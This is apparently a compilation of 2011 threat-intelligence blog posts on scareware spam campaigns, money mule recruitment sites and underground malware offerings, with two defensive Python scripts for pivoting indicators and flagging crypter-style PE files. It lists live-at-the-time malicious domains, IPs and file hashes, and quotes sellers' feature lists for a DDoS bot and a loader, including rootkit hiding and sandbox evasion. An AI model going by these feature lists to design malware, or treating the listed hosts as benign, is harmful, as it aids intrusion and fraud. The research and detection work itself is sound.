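# any of the IP / e-mail parts may be missing, and stray lines ("Phones back
# to : AS19875; ...", "Monitoring of the campaign is ongoing.") must be skipped.
IP_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


def parse_line(line):
    """Return {'domain', 'ip', 'email'} for one phone-back line, else None."""
    parts = [p.strip() for p in line.strip().split(" - ")]
    first = parts[0]
    # A bare hostname (optionally with a path) has no spaces and at least one dot.
    if not first or " " in first or "." not in first.split("/", 1)[0]:
        return None
    rec = {"domain": first.split("/", 1)[0].lower(), "ip": None, "email": None}
    for part in parts[1:]:
        if IP_RE.match(part):
            rec["ip"] = part
        elif part.lower().startswith("email:"):
            rec["email"] = part.split(":", 1)[1].strip().lower()
    return rec


def parse_block(text):
    """Parse every phone-back line in a pasted list; non-IoC lines are dropped."""
    records = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec:
            records.append(rec)
    return records


def pivot(records, field):
    """Group domains by a shared 'ip' or 'email' value (hosting/registrant pivot)."""
    groups = defaultdict(set)
    for rec in records:
        if rec[field]:
            groups[rec[field]].add(rec["domain"])
    return dict(groups)


def overlap(records_a, records_b):
    """Domains, IPs and registrant e-mails that appear in both campaigns."""
    result = {}
    for field in ("domain", "ip", "email"):
        in_a = {r[field] for r in records_a if r[field]}
        in_b = {r[field] for r in records_b if r[field]}
        result[field] = sorted(in_a & in_b)
    return result


# Sample input: a handful of lines copied from the two lists in the posts above.
CAMPAIGN_A = """\
kynugypenihyf.com - Email: v8@ca4.ru
cixovatywo.com - Email: frenzy@ca4.ru
tetagyjaj.com - Email: kilt@bz3.ru
wamojafadezy.com - Email: kilt@bz3.ru
hyvijinymut.com/1017000312 - 99.198.114.189 - returns OK
cixovatywo.com - 99.198.114.101
tetagyjaj.com - 99.198.114.98
Monitoring of the campaign is ongoing.
"""

CAMPAIGN_B = """\
Phones back to : AS19875; AS8001; AS24940
cixovatywo.com - 78.46.105.205 - Email: frenzy@ca4.ru
tetagyjaj.com - 78.46.105.205 - Email: kilt@bz3.ru
hivanedak.com - 188.95.54.242 - Email: steps@ppmail.ru
wamojafadezy.com - 78.46.105.205 - Email: acts@free-id.ru
"""

if __name__ == "__main__":
    a, b = parse_block(CAMPAIGN_A), parse_block(CAMPAIGN_B)
    for key, val in overlap(a, b).items():
        print(f"shared {key}s: {val}")
    for ip, domains in pivot(b, "ip").items():
        print(f"{ip} hosts {sorted(domains)}")
```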

This post has been reproduced from [3]Dancho Danchev's blog. Follow him [4]on Twitter.

1. http://www.virustotal.com/file-scan/report.html?id=c03711dbafae9b296daed8720f997d84caa5e5a5407a689926050a061d67b932-1302627694

2. http://www.virustotal.com/file-scan/report.html?id=c912a975e3c2fc911d6550d86e8fd89dbd30e3d1e07d788b45aac0d6cf61e83c-1302627443

3. http://ddanchev.blogspot.com/

4. http://twitter.com/danchodanchev
Spamvertised "Successful! Order 977132" Leads to Scareware (2011-04-28 14:50)

A currently ongoing malware campaign is impersonating Bobijou Inc for malware-serving purposes.

Sample subject: "Successful! Order 977132"

Sample message: "Thank you for ordering from Bobijou Inc. This message is to inform you that your order has been received and is currently being processed.

Your order reference is 901802. You will need this in all correspondence. This receipt is NOT proof of purchase.

We will send a printed invoice by mail to your billing address.

You have chosen to pay by credit card. Your card will be charged for the amount of 262.00 USD and "Bobijou Inc." will appear next to the charge on your statement. You will receive a separate email confirming your order has been despatched. Your purchase and delivery information appears below in attached file.

Thanks again for shopping at Bobijou Inc."

Sample attachments: Order_details.zip 


Detection rates:

Order_details.exe - [1]Trojan.FakeAV - Result: 24/40 (60.0 %)

MD5: 7c810cbb47c9f937b5f663b51ab7ee50

SHA1: b4faf8c724727381abb11c44b71605ff6e65cbbf

SHA256: 0bda3bdcffdda0fee31fe35cfea2fb644ff8e549a0a83632faa19cd43e02b904

Upon execution phones back to:

kkojjors.net/f/g.php - 95.64.9.15 - Email: admin@firtryt.biz

variantov.com/pusk.exe - 94.63.149.26 - Email: admin@variantov.com

Detection rate for the scareware variant pusk.exe:

pusk.exe - [2]Suspicious.Cloud.5 - Result: 4/41 (9.8 %)

MD5: bbd466a67586003776e295eaf3d2976c

SHA1: 6a8e1d84157c76b4c9238fc23d28686244f6650f

SHA256: ee008f9039534f062bd277860060461064e760bdaa90a36595b9780be54a5a05
Upon execution phones back to:



Monitoring of the campaign is ongoing. 

Related posts: 

[3] Spamvertised "Reqest Rejected" Campaign Serving Scareware

[4] Spamvertised DHL Notifications Scareware Campaign 

[5] Spamvertised Post Office Express Mail (USPS) Emails 
Serving Malware 

[6] Spamvertised United Parcel Service notifications serve 
malware 

[7] Spamvertised FedEx Notifications Spread Malware 

[8] Spamvertised DHL Notification Malware Campaign 

[9] More Spamvertised DHL Notifications Spread Malware 

This post has been reproduced from [10]Dancho Danchev's blog. Follow him [11]on Twitter.

1. http://www.virustotal.com/file-scan/report.html?id=0bda3bdcffdda0fee31fe35cfea2fb644ff8e549a0a83632faa19cd43e02b904-1303915483

2. http://www.virustotal.com/file-scan/report.html?id=ee008f9039534f062bd277860060461064e760bdaa90a36595b9780be54a5a05-1303916125

3. http://ddanchev.blogspot.com/2011/04/spamvertised-reqest-rejected-campaign.html

4. http://ddanchev.blogspot.com/2011/04/spamvertised-dhl-notifications.html

5. http://ddanchev.blogspot.com/2011/03/spamvertised-post-office-express-mail.html

6. http://ddanchev.blogspot.com/2011/03/spamvertised-united-parcel-service.html

7. http://ddanchev.blogspot.com/2011/03/spamvertised-fedex-notifications-spread.html

8. http://ddanchev.blogspot.com/2011/03/spamvertised-dhl-notification-malware.html

9. http://ddanchev.blogspot.com/2011/03/more-spamvertised-dhl-notifications.html

10. http://ddanchev.blogspot.com/

11. http://twitter.com/danchodanchev
1.5 May
Summarizing ZDNet's Zero Day Posts for April (2011-05-09 12:50)

The following is a brief summary of all of my posts at ZDNet's Zero Day for April. You can subscribe to my [1]personal RSS feed, [2]Zero Day's main feed, or follow me on Twitter:

Recommended reading: 

• [3] Netcraft survey indicates slow adoption of Extended 
Validation SSL certificates 

01. [4]Spamvertised "Reqest Rejected" campaign leads to 
scareware 

02. [5]Spamvertised 'Facebook. Your password has been changed!' emails lead to malware

03. [6]Malware Watch: 'Spam is sent from your FaceBook account'; Spamvertised malicious photos

04. [7]Spamvertised Easter Greetings lead to malware

05. [8]Netcraft survey indicates slow adoption of Extended 
Validation SSL certificates 

06. [9]'You've got a postcard' emails lead to exploits and 
scareware 

07. [10]Fake antivirus for mobile platform spotted 


This post has been reproduced from [11]Dancho Danchev's blog. Follow him [12]on Twitter.

1. http://www.zdnet.com/topics/dancho+danchev?o=1&mode=rss&tag=mantle_skin:content

2. http://feeds.feedburner.com/zdnet/security

3. http://www.zdnet.com/blog/security/netcraft-survey-indicates-slow-adoption-of-extended-validation-ssl-certificates/8576

4. http://www.zdnet.com/blog/security/spamvertised-reqest-rejected-campaign-leads-to-scareware/8529

5. http://www.zdnet.com/blog/security/spamvertised-facebook-your-password-has-been-changed-emails-lead-to-malware/8545

6. http://www.zdnet.com/blog/security/malware-watch-spam-is-sent-from-your-facebook-account-spamvertised-malicious-photos/8565

7. http://www.zdnet.com/blog/security/spamvertised-easter-greetings-lead-to-malware/8571

8. http://www.zdnet.com/blog/security/netcraft-survey-indicates-slow-adoption-of-extended-validation-ssl-certificates/8576

9. http://www.zdnet.com/blog/security/youve-got-a-postcard-emails-lead-to-exploits-and-scareware/8590

10. http://www.zdnet.com/blog/security/fake-antivirus-for-

11. http://ddanchev.blogspot.com/

12. http://twitter.com/danchodanchev
Don't Play Poker on an Infected Table - Part Five (2011-05-09 15:52)

A currently spamvertised campaign is enticing end users into downloading a fraudulent online gambling application, KingSpinEN.exe. The campaign is part of last month's [1]Don't Play Poker on an Infected Table - Part Four series.

Detection rate: 

KingSpinEN.exe - [2]W32/Casino.F.gen!Eldorado - Result: 16/43 (37.2 %)

MD5: ead8156a838842bc8463995a91eee08b

SHA1: 239594a514c461c63dc8da69b08b9b63baaf2579

SHA256: 491c291eaed67268d14a36470e5d6f6d4ed829055fe4a2897ac5f050b50a2e36

Upon execution phones back to:

- download.thepalacegroupgaming.com/tracking.aspx?ul=en&casino=spinpalace&banner_tag=a20337&uuid=%7b9F9E0585-9340-45C0-9EC7-46FBE5E7127F%7d&state=100

- spinpalace.mgsmup.com/mupp/spinpalace/spinpalace_install.cab

- spinpalace.mgsmup.com/mupp/spinpalace/spinpalace.cab

- download.thepalacegroupgaming.com/tracking.aspx?ul=en&casino=spinpalace&banner_tag=a20337&uuid=%7b9F9E0585-9340-45C0-9EC7-46FBE5E7127F%7d&state=422

- marketing.valueactive.eu/VIP/animations/en/movies_en.htm

Portfolio of fraudulent online gambling domains part of the campaign. The majority are hosted within AS49130, ARNET-AS SC ArNet Connection SRL:


Monitoring of the campaign is ongoing.

Related posts:



[3] Don't Play Poker on an Infected Table - Part Four 

[4] Don't Play Poker on an Infected Table - Part Three 

[5] Don't Play Poker on an Infected Table - Part Two 

[6] Don't Play Poker on an Infected Table 

This post has been reproduced from [7]Dancho 
Danchev's blog. Follow him [8]on Twitter. 

1. http://ddanchev.blogspot.com/2011/04/dont-play-poker-on-infected-table-part.html

2. http://www.virustotal.com/file-scan/report.html?id=491c291eaed67268d14a36470e5d6f6d4ed829055fe4a2897ac5f050b50a2e36-1304948544

3. http://ddanchev.blogspot.com/2011/04/dont-play-poker-on-infected-table-part.html

4. http://ddanchev.blogspot.com/2010/03/dont-play-poker-on-infected-table-part.html

5. http://ddanchev.blogspot.com/2010/02/dont-play-poker-on-infected-table-part.html

6. http://ddanchev.blogspot.com/2007/09/dont-play-poker-on-infected-table.html

7. http://ddanchev.blogspot.com/

8. http://twitter.com/danchodanchev
A Peek Inside a New DDoS Bot - "Snap" (2011-05-09 17:03)

Sampling malicious activity through the eyes of the cybercriminal is always beneficial in the context of timely spotting valuable trends and fads within the ecosystem, given that a decent sample of malicious activity is obtained.

In this post, we'll review a new DDoS bot on the block - "Snap".

This modular bot differentiates itself by offering the ability to choose between different modules to be added to the final package, and by allowing the operator to perform two "proprietary" DDoS functions, namely TurboSYN and TrafficDDoS. Next to its core DDoS functionality, the coder of the bot is differentiating by offering Form Grabbing, Reverse Socks, MailSpamming, IM-Spamming and Exploits launching functionality.

More details from the actual proposition:

[+] language the bot is coded in: MASM
[+] no external dependencies, no runtimes, no frameworks!
[+] Ability to work with roaming user accounts
[+] modularized structure of the bot
[+] Second Backup Service watches process activity and restarts bot on failover
[+] User Mode rootkit
-> [+] runs as a service and hides itself
-> [+] hides & protects root process
-> [+] hides & protects files
-> [+] hides the root processes
-> [+] hides already used local & remote TCP port(s)
-> [+] hides already used local & remote UDP port(s)
-> [+] hides already used regkeys
[+] semi polymorphic architecture
-> [+] uses random legit process, file & service names
-> [+] generates a unique stub every run
[+] bot doesn't use EOF, has no import table, doesn't need relocation and TLS section => very good crypter support
[+] Unicode support for Asian PCs
[+] detects common sandboxes, virtual OSs, emulators, and analysis tools

===[ Webpanel ]===

[+] the webpanel is developed with Dreamweaver CS5 and an Ajax framework using MySQL and PHP
[+] multi theme support available
[+] multi command support => every victim can do as many threads as you want it to
[+] reliable protocol which creates the lowest possible server load
[+] modularized structure of the bot

===[ Modules ]===

[+] Base price (Core) for 250 $

Loader:
[+] Load module (simple) +0 $
[+] Load module (extended) for 50 $

Proxy:
[+] Socks5 Daemon for 50 $
[+] reverse Socks 4/Socks 4a/Socks 5/HTTP(s) for 150 $

DDoS:
[+] DDoS Module (http/syn) for 50 $
[+] DDoS Module (full) for 100 $

DDoS (full) + Load module (extended) + Socks5 Daemon for 400 $
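The proposition's "no import table, doesn't need relocation and TLS section => very good crypter support" line doubles as a triage signal for defenders: all three properties are readable straight from the PE optional header's data directories. The following is an added example, not code from the original post or from the bot; every function name is this example's own, and build_minimal_pe() is a constructed header-only stand-in for a real sample, not an actual binary.

```python
"""Triage heuristic for the "no import table / no relocations / no TLS" profile.

Added example, not code from the original post or from the bot. It reads the
PE data directories and flags the three properties the seller advertises as
"very good crypter support". build_minimal_pe() is a constructed stand-in
for a real sample so the script runs offline.
"""
import struct

# Data directory slots (PE/COFF specification) and the COFF characteristic bit.
DIR_IMPORT = 1
DIR_BASERELOC = 5
DIR_TLS = 9
IMAGE_FILE_RELOCS_STRIPPED = 0x0001
PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B


def read_headers(pe: bytes):
    """Return (coff_characteristics, [(rva, size), ...]) for a PE image."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    size_opt, characteristics = struct.unpack_from("<HH", pe, coff + 16)
    opt = coff + 20
    magic = struct.unpack_from("<H", pe, opt)[0]
    if magic == PE32_MAGIC:
        count_off, dir_off = 92, 96
    elif magic == PE32PLUS_MAGIC:
        count_off, dir_off = 108, 112
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    count = struct.unpack_from("<I", pe, opt + count_off)[0]
    dirs = []
    for i in range(count):
        entry = opt + dir_off + 8 * i
        # Stop at the end of the optional header: a hostile directory count
        # must not make the parser read past it.
        if entry + 8 > opt + size_opt:
            break
        dirs.append(struct.unpack_from("<II", pe, entry))
    return characteristics, dirs


def crypter_profile(pe: bytes) -> dict:
    """Flags matching the advertised profile; each is True when suspicious."""
    characteristics, dirs = read_headers(pe)

    def present(slot):
        return slot < len(dirs) and dirs[slot] != (0, 0)

    return {
        # A real Windows program nearly always imports something; a stub that
        # resolves every API by hand (hash lookups) leaves this slot empty.
        "no_import_table": not present(DIR_IMPORT),
        # Either no base relocation directory or the RELOCS_STRIPPED flag set.
        "no_relocations": (not present(DIR_BASERELOC)
                           or bool(characteristics & IMAGE_FILE_RELOCS_STRIPPED)),
        # Most legitimate executables also lack TLS callbacks, so this flag on
        # its own is weak evidence; it only adds weight to the other two.
        "no_tls": not present(DIR_TLS),
    }


def profile_score(pe: bytes) -> int:
    """Number of matching flags (0-3); treat 3 as worth a manual look."""
    return sum(crypter_profile(pe).values())


def build_minimal_pe(imports=True, relocs=True, tls=True) -> bytes:
    """Constructed PE32 header-only image used as sample input (not a real binary)."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, len(dos))  # e_lfanew: PE header follows the DOS header
    num_dirs = 16
    size_opt = 96 + 8 * num_dirs
    # Machine=i386, 0 sections, no timestamp/symbols, optional header size,
    # Characteristics = EXECUTABLE_IMAGE | 32BIT_MACHINE.
    coff = struct.pack("<HHIIIHH", 0x014C, 0, 0, 0, 0, size_opt, 0x0102)
    opt = bytearray(size_opt)
    struct.pack_into("<H", opt, 0, PE32_MAGIC)
    struct.pack_into("<I", opt, 92, num_dirs)
    for slot, wanted, rva, size in ((DIR_IMPORT, imports, 0x2000, 0x50),
                                    (DIR_BASERELOC, relocs, 0x3000, 0x20),
                                    (DIR_TLS, tls, 0x4000, 0x18)):
        if wanted:
            struct.pack_into("<II", opt, 96 + 8 * slot, rva, size)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    for name, sample in (("ordinary", build_minimal_pe()),
                         ("stub-like", build_minimal_pe(False, False, False))):
        print(name, profile_score(sample), crypter_profile(sample))
```

Run against a directory of collected samples, a score of 3 is a cheap first filter before any sandbox run; the sandbox-detection claim in the same proposition is one more reason to keep such a static pre-check in the pipeline.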



Related posts:

[1] Coding Spyware and Malware for Hire
[2] Will Code Malware for Financial Incentives
[3] E-crime and Socioeconomic Factors
[4] Web Based Botnet Command and Control Kit 2.0
[5] BlackEnergy DDoS Bot Web Based
[6] A New DDoS Malware Kit in the Wild
[7] The Cyber Bot - Web Based Malware
[8] The Black Sun Bot - Web Based Malware
[9] Custom DDoS Capabilities Within a Malware
[10] Botnet on Demand Service
[11] Loads.cc - DDoS for Hire Service
[12] Using Market Forces to Disrupt Botnets
[13] Botnet Communication Platforms
[14] A Botnet Master's To-Do List
[15] DDoS on Demand VS DDoS Extortion
[16] How Does a Botnet with 100k Infected PCs Look Like?

This post has been reproduced from [17]Dancho Danchev's blog. Follow him [18]on Twitter.
5. http://ddanchev.blogspot.com/2008/02/blackenergy-ddos-bot-web-based-c.html
6. http://ddanchev.blogspot.com/2007/09/new-ddos-malware-kit-in-wild.html
7. http://ddanchev.blogspot.com/2007/04/shots-from-malicious-wild-west-sample_20.html
8. http://ddanchev.blogspot.com/2007/04/shots-from-malicious-wild-west-sample_7672.html
9. http://ddanchev.blogspot.com/2007/09/custom-ddos-capabilities-within-malware.html
10. http://ddanchev.blogspot.com/2007/10/botnet-on-demand-service.html
11. http://ddanchev.blogspot.com/2008/03/loadsccs-ddos-for-hire-service.html
12. http://ddanchev.blogspot.com/2008/06/using-market-forces-to-disrupt-botnets.html
13. http://ddanchev.blogspot.com/2007/03/botnet-communication-platforms.html
14. http://ddanchev.blogspot.com/2008/04/botnet-masters-
15. http://ddanchev.blogspot.com/2007/05/ddos-on-demand-vs-ddos-extortion.html
16. http://ddanchev.blogspot.com/2008/05/how-does-botnet-with-100k-infected-pcs.html
17. http://ddanchev.blogspot.com/
18. http://twitter.com/danchodanchev

Keeping Money Mule Recruiters on a Short Leash - Part Seven (2011-05-10 12:41)

Continuing what has turned into a tradition, the "[1]Keeping Money Mule Recruiters on a Short Leash" series, in this post we'll review currently active money mule recruitment sites and provide vital OSINT data on what currently acts as the cornerstone of the monetization process that cybercriminals rely on: risk forwarding, by way of money mule recruitment, for the processing of fraudulently obtained funds.

Description used on the majority of templates: 

"Looking to buy art? Sell art? Alternative Art Ltd is the first choice for artists and buyers alike! Alternative Art Ltd is an effective tool for the artist and emerging artist to market and promote their art in a professional and inexpensive manner. We will market your art to the international community of art buyers. Whether you are looking to buy or sell original art, Alternative Art Ltd is the premier art site for those seeking to buy or sell original art online.

NO COMMISSIONS! Whether you are looking to buy art or sell art, our site is fully optimized to get results FAST! Alternative Art Ltd is the future of buying and selling original art online. Artists who choose to sell their original art will receive maximum marketing exposure. For artists, selling your art has never been easier, faster, or more cost-effective. We will help you sell your original art DIRECTLY to buyers worldwide with NO COMMISSIONS. Those wishing to buy art online are invited to browse our extensive online galleries of original art. Never before has it been this easy for a buyer to select high-quality original art online. We update daily with new original art from our artist members.

Alternative Art Ltd offers casual collectors and serious connoisseurs alike an amazing collection of original art pieces from the world over. You'll enjoy unparalleled customer care from a knowledgeable and friendly staff of experts. For artists, the inconvenience and high costs of traditional galleries are completely eliminated. Our team of experts puts the latest technology to work for you, putting your original art in front of millions of potential art buyers!"

Money mule recruitment domains: 
Name servers of notice: 


Currently active and responding money mule recruitment domains, residing within AS42708, PORTLANE Network; AS29713, INTERPLEXINC Interplex LLC.; AS24940, HETZNER-AS Hetzner Online AG RZ:


Psychological evaluation tests were found within AS29713; basically every domain name has its associated binary:



Monitoring of money mule recruitment campaigns is 
ongoing. 

Related posts:

[4] Keeping Money Mule Recruiters on a Short Leash - Part Six
[5] Keeping Money Mule Recruiters on a Short Leash - Part Five
[6] The DNS Infrastructure of the Money Mule Recruitment Ecosystem
[7] Keeping Money Mule Recruiters on a Short Leash - Part Four
[8] Money Mule Recruitment Campaign Serving Client-Side Exploits
[9] Keeping Money Mule Recruiters on a Short Leash - Part Three
[10] Money Mule Recruiters on Yahoo!'s Web Hosting
[11] Dissecting an Ongoing Money Mule Recruitment Campaign
[12] Keeping Money Mule Recruiters on a Short Leash - Part Two
[13] Keeping Reshipping Mule Recruiters on a Short Leash
[14] Keeping Money Mule Recruiters on a Short Leash
[15] Standardizing the Money Mule Recruitment Process
[16] Inside a Money Laundering Group's Spamming Operations
[17] Money Mule Recruiters use ASProx's Fast Fluxing Services
[18] Money Mules Syndicate Actively Recruiting Since 2002
Keeping Money Mule Recruiters on a Short Leash - Part Eight - Historical OSINT (2011-05-25 13:18)

With money mule recruitment scams continuing to represent an inseparable part of the cybercrime ecosystem, in this post I'll summarize the findings from an assessment I conducted on currently active mule recruitment scams over a month ago. As always, the historical OSINT offered is invaluable in case-building practices, in particular against a very well segmented group of mule recruiters using identical templates, which they've purchased from a vendor of standardized mule recruitment templates.

Domains known to have been participating in money mule recruitment campaigns, currently offline:


Name servers of notice, historical OSINT for the responding IPs provided:


Monitoring of money mule recruitment campaigns is 
ongoing. 

Related posts:

[1] Keeping Money Mule Recruiters on a Short Leash - Part Seven
[2] Keeping Money Mule Recruiters on a Short Leash - Part Six
[3] Keeping Money Mule Recruiters on a Short Leash - Part Five
[4] The DNS Infrastructure of the Money Mule Recruitment Ecosystem
[5] Keeping Money Mule Recruiters on a Short Leash - Part Four
[6] Money Mule Recruitment Campaign Serving Client-Side Exploits
[7] Keeping Money Mule Recruiters on a Short Leash - Part Three
[8] Money Mule Recruiters on Yahoo!'s Web Hosting
[9] Dissecting an Ongoing Money Mule Recruitment Campaign
[10] Keeping Money Mule Recruiters on a Short Leash - Part Two
[11] Keeping Reshipping Mule Recruiters on a Short Leash
[12] Keeping Money Mule Recruiters on a Short Leash
[13] Standardizing the Money Mule Recruitment Process
[14] Inside a Money Laundering Group's Spamming Operations
[15] Money Mule Recruiters use ASProx's Fast Fluxing Services
[16] Money Mules Syndicate Actively Recruiting Since 2002
A Peek Inside the Vertex Net Loader (2011-05-26 16:34)

It appears that the author of the DarkComet RAT has been keeping himself rather busy.

In early-stage development (currently in BETA), the Vertex Net Loader is your typical web-based command and control malware loader, worth keeping an eye on.

More details:

Info on the loader:

This is the small program that will send/retrieve info from/to the web panel; it is like the server part of a RAT. The loader is coded in C++. Size unpacked is 100kb, compressed is very small and still stable. I chose C++ as the language for this project because I have coded C++ for a long time but never released any security software, so as a friend said it is a shame to have knowledge of C++ and not use it instead of Delphi all the time. Also C++ is faster and more stable than any other language.

Features of the loader:

- Send message box
- Execute any kind of commands
- Close loader process
- Download files and execute them
- Get the process list
- Get the modules list from PID
- Set the key logger status ON/OFF
- Retrieve the key logger logs
- Read the file content and retrieve it
- Uninstall the loader
- Httpflood, same technologies as I used for DarkComet, that is very powerful!
- Remote shell
- Visit any webpage

Upcoming features:

- FWB
- More commands
- Panel Installer
- More possibilities in the webpanel
- User manager in the panel
- Plugins support
- and more.

Monitoring of Vertex Net Loader's development is ongoing.
Keeping Money Mule Recruiters on a Short Leash - Part Nine (2011-05-30 12:09)

The following brief summarizes currently active money mule recruitment web sites, actively recruiting money mules for the processing of fraudulently obtained funds.

Currently active sites residing within AS42708, PORTLANE Network www.portlane.com; AS29713, INTERPLEX-INC Interplex LLC; AS38913, Enter-Net-Team-AS; AS24940, HETZNER-AS Hetzner Online:

Name servers of notice:


Monitoring of money mule recruitment campaigns is 
ongoing. 

Related posts:

[11] Keeping Money Mule Recruiters on a Short Leash - Part Two
[12] Keeping Reshipping Mule Recruiters on a Short Leash
[13] Keeping Money Mule Recruiters on a Short Leash
[14] Standardizing the Money Mule Recruitment Process
[15] Inside a Money Laundering Group's Spamming Operations
[17] Money Mules Syndicate Actively Recruiting Since 2002
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Keeping Money Mule Recruiters on a Short Leash - 
Part Nine (2011-05-30 12:09) 

The following brief summarizes currently active money mule 
recruitment web sites, actively recruiting money mules 

for the processing of fraudulently obtained funds. 

Currently active sites residing within AS42708, PORTLANE 
Network www.portlane.com; AS29713, INTERPLEX- 

INC Interplex LLC; AS38913, Enter-Net-Team-AS; AS24940, 
HETZNER-AS Hetzner Online: 

Name servers of notice:


Monitoring of money mule recruitment campaigns is ongoing.
Summarizing ZDNet's Zero Day Posts for May (2011-06-08 16:24)

The following is a brief summary of all of my posts at ZDNet's Zero Day for May. You can subscribe to my [1]personal RSS feed, [2]Zero Day's main feed, or follow me on Twitter:

Recommended reading:

• [3] China's Blue Army: When nations harness hacktivists 
for information warfare 

01. [4]Vishing attack on Skype pushing scareware 

02. [5]Commtouch: 71 percent increase in new zombies 

03. [6]Osama execution video scam spreading on Facebook 

04. [7]New MAC OS X scareware delivered through blackhat 
SEO 

05. [8]'You visit illegal websites' FBI-themed emails lead to 
scareware 

06. [9]Fake Microsoft Patch Tuesday emails lead to ZeuS 
crimeware 

07. [10]'Enable Dislike Button' scam spreading on Facebook 


08. [11]NASA's Goddard Space Flight Center FTP server hacked

09. [12]'Checkout Your PROFILE Stalkers' scam spreading 
on Facebook 

10. [13]'The World Funniest Condom Commercial - LOL' 
scam spreading on Facebook 

11. [14]China's Blue Army: When nations harness 
hacktivists for information warfare 

This post has been reproduced from [15]Dancho 
Danchev's blog. Follow him [16]on Twitter. 

1. http://www.zdnet.com/topics/dancho+danchev?o=1&mode=rss&tag=mantle_skin:content

2. http://feeds.feedburner.com/zdnet/security

3. http://www.zdnet.com/blog/security/chinas-blue-army-when-nations-harness-hacktivists-for-information-warfare-/8686

4. http://www.zdnet.com/blog/security/vishing-attack-on-skype-pushing-scareware/8598

5. http://www.zdnet.com/blog/security/commtouch-71-percent-increase-in-new-zombies/8602

6. http://www.zdnet.com/blog/security/osama-execution-video-scam-spreading-on-facebook/8607

7. http://www.zdnet.com/blog/security/new-mac-os-x-scareware-delivered-through-blackhat-seo/8614

8. http://www.zdnet.com/blog/security/you-visit-illegal-websites-fbi-themed-emails-lead-to-scareware/8618

9. http://www.zdnet.com/blog/security/fake-microsoft-patch-tuesday-emails-lead-to-zeus-crimeware/8646

10. http://www.zdnet.com/blog/security/enable-dislike-button-scam-spreading-on-facebook/8655

11. http://www.zdnet.com/blog/security/nasas-goddard-space-flight-center-ftp-server-hacked/8660

12. http://www.zdnet.com/blog/security/checkout-your-profile-stalkers-scam-spreading-on-facebook/8665

13. http://www.zdnet.com/blog/security/the-world-funniest-condom-commercial-lol-scam-spreading-on-facebook/8680

14. http://www.zdnet.com/blog/security/chinas-blue-army-when-nations-harness-hacktivists-for-information-warfare-/8686

15. http://ddanchev.blogspot.com/

16. http://twitter.com/danchodanchev
Summarizing ZDNet's Zero Day Posts for June (2011-07-07 12:24)

The following is a brief summary of all of my posts at ZDNet's Zero Day for June. You can subscribe to my [1]personal RSS feed, [2]Zero Day's main feed, or follow me on Twitter:

01. [3]'Hot Lesbian Video - Rihanna and Hayden Panettiere' 
scam on Facebook leads to Mac malware 

02. [4]Sony Europe hacked by Lebanese grey hat hacker 

03. [5]Spamvertised United Parcel Service emails lead to 
scareware 

04. [6]The most common iPhone passcodes 

05. [7]AutoRun malware infections declining 

06. [8]'McDonald's Free Dinner Day' emails lead to 
scareware 

07. [9]Two DDoS attacks hit Network Solutions 

08. [10]'The Creator of LulzSec arrested in London' scam spreading on Facebook

09. [11]Federal Reserve themed emails lead to ZeuS crimeware

10. [12]'Photographer commited SUICIDE 3 days after 
shooting THIS video!' scam spreading on Facebook 


This post has been reproduced from [13]Dancho 
Danchev's blog. Follow him [14]on Twitter. 

1. http://www.zdnet.com/topics/dancho+danchev?o=1&mode=rss&tag=mantle_skin:content

2. http://feeds.feedburner.com/zdnet/security

3. http://www.zdnet.com/blog/security/hot-lesbian-video-rihanna-and-hayden-panettiere-scam-on-facebook-leads-to-mac-malware/8717

4. http://www.zdnet.com/blog/security/sony-europe-hacked-by-lebanese-grey-hat-hacker-/8725

5. http://www.zdnet.com/blog/security/spamvertised-united-parcel-service-emails-lead-to-scareware/8745

6. http://www.zdnet.com/blog/security/the-most-common-iphone-passcodes/8760

7. http://www.zdnet.com/blog/security/autorun-malware-infections-declining/8772

8. http://www.zdnet.com/blog/security/mcdonalds-free-dinner-day-emails-lead-to-scareware/8848

9. http://www.zdnet.com/blog/security/two-ddos-attacks-hit-network-solutions/8852

10. http://www.zdnet.com/blog/security/the-creator-of-lulzsec-arrested-in-london-scam-spreading-on-facebook/8856

11. http://www.zdnet.com/blog/security/federal-reserve-themed-emails-lead-to-zeus-crimeware/8862

12. http://www.zdnet.com/blog/security/photographer-commited-suicide-3-days-after-shooting-this-video-scam-spreading-on-facebook/8911

13. http://ddanchev.blogspot.com/

14. http://twitter.com/danchodanchev
Keeping Money Mule Recruiters on a Short Leash - Part Ten (2011-07-07 13:25)

The following intelligence brief is part of the [1]Keeping Money Mule Recruiters on a Short Leash series. In it, I'll expose currently active money mule recruitment domains, their domain registration details, currently responding IPs, and related ASs.

Currently active money mule recruitment domains:

The domains reside within the following ASs: AS10297, RoadRunner RR-RC; AS42708, PORTLANE Network; AS26496, GODADDY.com; AS29713, INTERPLEXINC; AS24940, HETZNER-AS Hetzner Online.

Name servers of notice:



Monitoring of ongoing money mule recruitment campaigns continues.

Related posts: 

[2] Keeping Money Mule Recruiters on a Short Leash - Part 
Nine 

[3] Keeping Money Mule Recruiters on a Short Leash - Part 
Eight - Historical OSINT 

[4] Keeping Money Mule Recruiters on a Short Leash - Part 
Seven 

[5] Keeping Money Mule Recruiters on a Short Leash - Part Six 

[6] Keeping Money Mule Recruiters on a Short Leash - Part 
Five 

[7] The DNS Infrastructure of the Money Mule Recruitment 
Ecosystem 



[8] Keeping Money Mule Recruiters on a Short Leash - Part 
Four 

[9] Money Mule Recruitment Campaign Serving Client-Side 
Exploits 

[10] Keeping Money Mule Recruiters on a Short Leash - Part 
Three 

[11] Money Mule Recruiters on Yahoo!'s Web Hosting

[12] Dissecting an Ongoing Money Mule Recruitment 
Campaign 

[13] Keeping Money Mule Recruiters on a Short Leash - Part 
Two 

[14] Keeping Reshipping Mule Recruiters on a Short Leash 

[15] Keeping Money Mule Recruiters on a Short Leash 

[16] Standardizing the Money Mule Recruitment Process 

[17] Inside a Money Laundering Group's Spamming Operations

[18] Money Mule Recruiters use ASProx's Fast Fluxing 
Services 

[19] Money Mules Syndicate Actively Recruiting Since 2002 

This post has been reproduced from [20]Dancho 
Danchev's blog. 
